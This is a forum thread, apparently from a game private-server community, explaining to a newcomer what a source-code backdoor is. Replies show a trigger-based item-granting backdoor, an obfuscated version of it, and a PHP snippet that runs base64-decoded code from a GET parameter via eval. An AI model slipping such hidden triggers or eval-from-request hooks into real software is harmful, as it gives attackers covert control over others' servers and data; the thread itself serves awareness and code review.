Information to newbies

Horyon

Пляшущий с бубном
Участник
Сообщения
220
Розыгрыши
0
Решения
4
Репутация
53
Реакции
78
Баллы
273
Хроники
  1. Shadow of the Kamael
Исходники
Присутствуют
Сборка
L2jMobius Master class ch2
Hello guys.

Yesterday i was reading some posts and find that thing make me want to know about. The subject is "backdoor". From the conversation looks like it is a vulnerability in the source project that alow the creator of this backdoor make "bad" stuff.

Can one of you take some minutes for share some knowledge about it?

Ty in advance.
 
Решение
This is a primitive example, but it will show a rough direction.

C#:
EventHandler ATTACKED( attacker )
    {
        if(attacker.name == "BackdoorBasya" && OwnItemCount(attacker, @adena) == 5120)
        {
            GiveItem1(attacker, @coin_of_luck, 1);
        }
    }

Char with name BackdoorBasya and adena amount in inventory 5120, after every hit npc - get 1 CoL.

This only example. By itself, a good backdoor does not look like that, sometimes it's almost impossible to find.
This is a primitive example, but it will show a rough direction.

C#:
EventHandler ATTACKED( attacker )
    {
        if(attacker.name == "BackdoorBasya" && OwnItemCount(attacker, @adena) == 5120)
        {
            GiveItem1(attacker, @coin_of_luck, 1);
        }
    }

Char with name BackdoorBasya and adena amount in inventory 5120, after every hit npc - get 1 CoL.

This only example. By itself, a good backdoor does not look like that, sometimes it's almost impossible to find.
 
Решение
default_npc,
This is a primitive example, but it will show a rough direction.

C#:
 EventHandler ATTACKED( attacker )
    {
        if(attacker.name == "BackdoorBasya" && OwnItemCount(attacker, @adena) == 5120)
        {
            GiveItem1(attacker, @coin_of_luck, 1);
        }
    }

Char with name BackdoorBasya and adena amount in inventory 5120, after every hit npc - get 1 CoL.

This only example. By itself, a good backdoor does not look like that, sometimes it's almost impossible to find.

hmmmmm... so basically its custom stuff inside a project(source) that the owner put to have ways to exploit one server that use his files.

the mobius source have that kind of stuff?

Anyway ty for info default i get it.
 
default_npc,


hmmmmm... so basically its custom stuff inside a project(source) that the owner put to have ways to exploit one server that use his files.

the mobius source have that kind of stuff?

Anyway ty for info default i get it.
Intruders try to hide backdoors.

As a simple example - code above can be:
C#:
EVENT_COUNT = 5120;
...
MANA_AMOUNT = 57;
...
SAVE_EVENT_STATE = 4036;
...

function bool checkEventCondition( attacker , itemId)
{
    return OwnItemCount(attacker, itemId) == EVENT_COUNT;
}
...
function eventRequest( attacker,  operationId, type)
{
    GiveItem1(attacker, operationId, type);
}
...
function EventHandler ATTACKED( attacker )
{
    local string event_npc;
    ...
    event_npc = "Piglet";
    ...
    if (attacker.name == event_npc && checkEventCondition(attacker, MANA_AMOUNT))
    {
        eventRequest(attacker, SAVE_EVENT_STATE, 1);
    }
   ...
}

It still do the same but a bit hidden(all code looks valid, and may be implemented in different parts of code).

Of course you don't really need a backdoor this way. You can hide code for remote contoll, add unhandled exeptions to broke some mechanics, add lower level code(that hard to read and understand) with custom script execution feature and etc.

Moreover, sometimes backdoors are created naturally without malicious intent
 
Последнее редактирование:
Sometimes, you can find something more interesting and not clear as examples higher.
I am from web development, and working with php. but i thinks this approach can be used for Java too.

Lets think that $value is not static, we get in from post or get.
PHP:
$settings = [
  'database_password' => 'secret value'
];
$value = 'dmFyX2R1bXAoJHNldHRpbmdzKTtleGl0KCk7';
eval(base64_decode($value));

As result, we will see
Форматирование (BB-код):
afaibyshev@Antons-MacBook-Pro test % php hack.php
array(1) {
  ["database_password"]=>
  string(12) "secret value"
}

Logic is very simple:
$value is base64 hash of some code.
here it is 'var_dump($settings);exit();'
After it, we decode this value and make eval.
Eval - execute code)

Also, it is easy to hide some magic strings, with using headers, or GET, or POST.
PHP:
$settings = [
  'database_password' => 'secret value'
];
$value = $_GET['hideErrors'] ?? '';
if (!empty($value)) {
    eval(base64_decode($value));
}

But, as you can see, we still use eval.


It is simple example for web, Java and server has more ways to do it....
So, good luck)
 
Nice subject to know exist. Will now on, look more deeply the code.

Ty for all that take sometime to some time to explain it. :)
 
Назад
Сверху Снизу